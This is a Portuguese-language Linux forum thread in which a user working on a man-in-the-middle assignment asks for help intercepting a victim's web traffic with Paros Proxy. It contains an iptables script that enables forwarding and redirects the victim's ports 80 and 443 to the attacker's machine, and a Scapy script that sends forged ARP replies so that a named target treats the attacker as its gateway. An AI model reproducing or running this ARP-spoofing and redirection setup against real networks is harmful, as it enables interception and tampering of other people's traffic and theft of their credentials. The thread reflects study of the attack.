Paros Proxy (MitM proxy) + Iptables

1. Paros Proxy (MitM proxy) + Iptables

Eric Lúcio da Silva Rodrigues
ericlucio

(usa Ubuntu)

Enviado em 26/04/2012 - 12:11h

Olá pessoal, estou fazendo um trabalho sobre man in the middle e meu objetivo é fazer com que o tráfego de dados entre uma máquina e um gateway seja interceptado e analisado e ou modificado pelo Paros Proxy.

Para máquinas locais é bem fácil configurar o paros proxy, basta configurar em qual PROXY virtual o Paros vai escutar, o padrão é localhost:8080 e depois ir no navegador e configurar para ele usar o proxy localhost:8080. Estou usando a config padrão.

O problema é que quero fazer isso em uma máquina que está na mesma rede que está mandando seus pacotes para o atacante achando que está enviado para o gateway.

Agora é que entra o IPTABLES, para fazer com que esses pacotes quando cheguem na maquina atacante eles sejam redirecionados para a porta onde o paros está escutando.

Estou usando essas configurações mas não está funcionando, gostaria da ajuda de vocês para poder fazer essa configuração:

################################///////////////###############################
#!/bin/sh
INTERFACE="eth0"
SERVERWEB='192.168.1.11' #ip atacante TENTEI COLOCAR DEPOIS DO IP A PORTA 8080 mas não funcionou

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

#clear rule..
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat

iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE

#rendirect traffic.. on my server/proxy
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination $SERVERWEB
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination $SERVERWEB


##################################//////////////////##############################


Estou seguindo esse artigo do clshack
http://www.clshack.com/en/arp-poisoning-scapy-web-request-spoofed-paros-proxy-on-backbox.html


MAQUINA ATACANTE: Distro BACKBOX
Vítima: Debian 6


SCRIPT PARA GERAR OS PACOTES ARP FALSOS:

#########################////////////################################
from scapy.all import *;
from time import sleep;
conf.iface='eth0';#network card XD

target="192.168.1.153";#Alvo / Vitima

router="192.168.1.1";#router

packet = ARP(); #create packet :P

packet.psrc = router # Gateway

packet.pdst = target # victim v.v

try:
while 1:
send(packet, verbose=0);
sleep(50);
except:
pass

###########################//////////############################

Obrigado pela atenção desde já,
Eric Lúcio



  


2. Paros

Eric Lúcio da Silva Rodrigues
ericlucio

(usa Ubuntu)

Enviado em 08/05/2012 - 10:20h

Alguém pode me dizer se já usou o paros proxy com sucesso para interceptar comunicação?






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts